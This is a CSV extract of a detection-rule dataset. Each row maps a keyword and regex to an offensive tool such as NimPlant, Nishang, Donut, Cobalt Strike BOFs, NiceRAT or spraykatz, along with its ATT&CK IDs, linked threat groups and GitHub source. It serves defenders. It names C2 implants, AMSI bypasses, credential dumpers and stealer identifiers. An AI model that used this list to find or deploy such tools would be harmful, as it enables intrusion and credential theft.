"*NimPlant*.tar.gz*",".{0,1000}NimPlant.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53414"
"*NimPlant*.zip*",".{0,1000}NimPlant.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53415"
"*nimplant.db*",".{0,1000}nimplant\.db.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53416"
"*NimPlant.dll*",".{0,1000}NimPlant\.dll.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53417"
"*NimPlant.nim*",".{0,1000}NimPlant\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53418"
"*NimPlant.nimble*",".{0,1000}NimPlant\.nimble.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53419"
"*NimPlant.py*",".{0,1000}NimPlant\.py.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53420"
"*nimplantPrint*",".{0,1000}nimplantPrint.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53421"
"*nimplants-*.js*",".{0,1000}nimplants\-.{0,1000}\.js.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53422"
"*nimplants.html*",".{0,1000}nimplants\.html.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","53423"
"*NimShellCodeLoader*",".{0,1000}NimShellCodeLoader.{0,1000}","offensive_tool_keyword","C2 related tools","A shellcode loader written using nim","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/aeverj/NimShellCodeLoader","1","1","N/A","N/A","10","10","656","121","2025-02-18T14:31:45Z","2021-01-19T15:57:01Z","53426"
"*NimSyscallLoader -*",".{0,1000}NimSyscallLoader\s\-.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","53427"
"*Ninja c2*",".{0,1000}Ninja\sc2.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","53428"
"*ninjac2*",".{0,1000}ninjac2.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","53429"
"*nipe.pl *",".{0,1000}nipe\.pl\s.{0,1000}","offensive_tool_keyword","nipe","An engine to make Tor network your default gateway. Tor enables users to surf the internet. chat and send instant messages anonymously.  and is used by a wide variety of people for both licit and illicit purposes. Tor has. for example. been used by criminals enterprises. hacktivism groups. and law enforcement  agencies at cross purposes. sometimes simultaneously. Nipe is a script to make the Tor network your default gateway.This Perl script enables you to directly route all your traffic from your computer to the Tor network through which you can surf the internet anonymously without having to worry about being tracked or traced back.","T1560 - T1573 - T1578","TA0005 - TA0007","N/A","N/A","Data Exfiltration","https://github.com/htrgouvea/nipe","1","0","N/A","N/A","N/A","10","2029","321","2025-04-03T13:57:13Z","2015-09-07T18:47:10Z","53430"
"*nircmdc.exe savescreenshot*",".{0,1000}nircmdc\.exe\ssavescreenshot.{0,1000}","offensive_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53433"
"*nirsoft.net/utils/browsing_history_view.html*",".{0,1000}nirsoft\.net\/utils\/browsing_history_view\.html.{0,1000}","offensive_tool_keyword","BrowsingHistoryView","BrowsingHistoryView is a utility that reads the history data of different Web browsers","T1217 - T1070 - T1113","TA0009 - TA0005 - TA0007","N/A","GOBLIN PANDA","Discovery","https://www.nirsoft.net/utils/browsing_history_view.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53436"
"*nishang.exe*",".{0,1000}nishang\.exe.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","53437"
"*nishang.ps1*",".{0,1000}nishang\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","53438"
"*nishang.psm1*",".{0,1000}nishang\.psm1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","53439"
"*Nishang.psm1*",".{0,1000}Nishang\.psm1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","0","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","53440"
"*nishang.psm1*",".{0,1000}nishang\.psm1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","53441"
"*nishang-0-3-4.html*",".{0,1000}nishang\-0\-3\-4\.html.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","53442"
"*Nishang-all-in-one*",".{0,1000}Nishang\-all\-in\-one.{0,1000}","offensive_tool_keyword","AmsiBypass","bypassing Anti-Malware Scanning Interface (AMSI) features","T1548.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell","1","1","N/A","N/A","10","10","1890","311","2024-11-28T10:31:15Z","2019-05-14T06:09:25Z","53443"
"*NixImports by dr4k0nia*",".{0,1000}NixImports\sby\sdr4k0nia.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","0","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","53445"
"*NixImports.csproj*",".{0,1000}NixImports\.csproj.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","53446"
"*NixImports.exe*",".{0,1000}NixImports\.exe.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","53447"
"*NixImports.git*",".{0,1000}NixImports\.git.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","53448"
"*NixImports.sln*",".{0,1000}NixImports\.sln.{0,1000}","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","N/A","3","207","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z","53449"
"*nixpal/shellsilo*",".{0,1000}nixpal\/shellsilo.{0,1000}","offensive_tool_keyword","shellsilo","cutting-edge tool that translates C syntax into syscall assembly and its corresponding shellcode","T1500 - T1588.002 - T1587.001 - T1546.015","TA0005 - TA0042","N/A","N/A","Resource Development","https://github.com/nixpal/shellsilo","1","1","N/A","N/A","6","2","132","13","2024-11-08T03:16:57Z","2024-03-08T02:04:04Z","53450"
"*nkbihfbeogaeaoehlefnkodbefgpgknn*",".{0,1000}nkbihfbeogaeaoehlefnkodbefgpgknn.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","53452"
"*nkddgncdjgjfcddamfgcmfnlhccnimig*",".{0,1000}nkddgncdjgjfcddamfgcmfnlhccnimig.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","53453"
"*nlbmnnijcnlegkjjpcfjclmcfggfefdm*",".{0,1000}nlbmnnijcnlegkjjpcfjclmcfggfefdm.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","53455"
"*nmake inject_local *",".{0,1000}nmake\sinject_local\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","53468"
"*nmap *--script *",".{0,1000}nmap\s.{0,1000}\-\-script\s.{0,1000}","offensive_tool_keyword","nmap","Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Discovery","https://nmap.org/book/nse-usage.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","53471"
"*nmap -Pn -p* --open -T4 -n -oG - * 2>/dev/null | grep -F Ports*",".{0,1000}nmap\s\-Pn\s\-p.{0,1000}\s\-\-open\s\-T4\s\-n\s\-oG\s\-\s.{0,1000}\s2\>\/dev\/null\s\|\sgrep\s\-F\sPorts.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","0","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","53473"
"*nmap -T3 -sT -Pn -n --open -p135 -oG -*",".{0,1000}nmap\s\-T3\s\-sT\s\-Pn\s\-n\s\-\-open\s\-p135\s\-oG\s\-.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","53475"
"*nmap/ncrack*",".{0,1000}nmap\/ncrack.{0,1000}","offensive_tool_keyword","ncrack","High-speed network authentication cracking tool.","T1110.001 - T1110.002 - T1110.003","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/nmap/ncrack","1","1","N/A","N/A","N/A","10","1123","250","2024-04-14T21:37:48Z","2015-12-21T23:48:00Z","53477"
"*nmap_port_scanner.py*",".{0,1000}nmap_port_scanner\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","53478"
"*nmap_port_scanner_ip_obj.py*",".{0,1000}nmap_port_scanner_ip_obj\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scirpts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","N/A","8","10","2098","1599","2024-10-22T13:31:06Z","2021-01-07T16:11:52Z","53479"
"*nmap_smb_scan_custom_*.txt*",".{0,1000}nmap_smb_scan_custom_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","53480"
"*nmapAnswerMachine.py*",".{0,1000}nmapAnswerMachine\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","53481"
"*nmap-reverse-lookup*",".{0,1000}nmap\-reverse\-lookup.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","53483"
"*nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4pz*",".{0,1000}nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA4pz.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","0","N/A","N/A","10","10","17","3","2024-10-09T15:36:46Z","2023-04-28T01:58:18Z","53484"
"*No cached domain password found!*",".{0,1000}No\scached\sdomain\spassword\sfound!.{0,1000}","offensive_tool_keyword","quarkspwdump","Quarks PwDump is a native Win32 tool to extract credentials from Windows operating systems","T1003 - T1003.001 - T1059","TA0006","N/A","LOTUS PANDA - PowerPool - Calypso","Credential Access","https://github.com/peterdocter/quarkspwdump","1","0","N/A","N/A","9","1","12","8","2015-06-25T04:22:21Z","2015-07-14T08:18:08Z","53485"
"*No credentials supplied* looking for null session shares!*",".{0,1000}No\scredentials\ssupplied.{0,1000}\slooking\sfor\snull\ssession\sshares!.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares  and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","53486"
"*no Mimik@tz - loaded successfully*",".{0,1000}no\sMimik\@tz\s\-\sloaded\ssuccessfully.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","53487"
"*No pwnable targets. Quitting.*",".{0,1000}No\spwnable\stargets\.\sQuitting\..{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","53488"
"*No sandbox-indicative DLLs were discovered loaded in any accessible running process*",".{0,1000}No\ssandbox\-indicative\sDLLs\swere\sdiscovered\sloaded\sin\sany\saccessible\srunning\sprocess.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","53489"
"*No unixUserPassword Found*",".{0,1000}No\sunixUserPassword\sFound.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53490"
"*no_session_payload.rb*",".{0,1000}no_session_payload\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","53491"
"*NoApiUser.exe*",".{0,1000}NoApiUser\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Use windows api to add users which can be used when net is unavailable","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/lengjibo/NetUser","1","1","N/A","N/A","10","10","420","90","2021-09-29T14:22:09Z","2020-01-09T08:33:27Z","53493"
"*noclient: failed to execute %s: %s*",".{0,1000}noclient\:\sfailed\sto\sexecute\s\%s\:\s\%s.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","N/A","10","4124","2071","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z","53494"
"*noconsolation /tmp/*",".{0,1000}noconsolation\s\/tmp\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a Beacon Object File (BOF) that executes unmanaged PEs inline and retrieves their output without allocating a console (i.e spawning conhost.exe)","T1055 - T1129","TA0005 - TA0003","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/fortra/No-Consolation","1","0","N/A","N/A","9","6","593","68","2024-10-23T16:25:21Z","2023-11-06T22:01:42Z","53495"
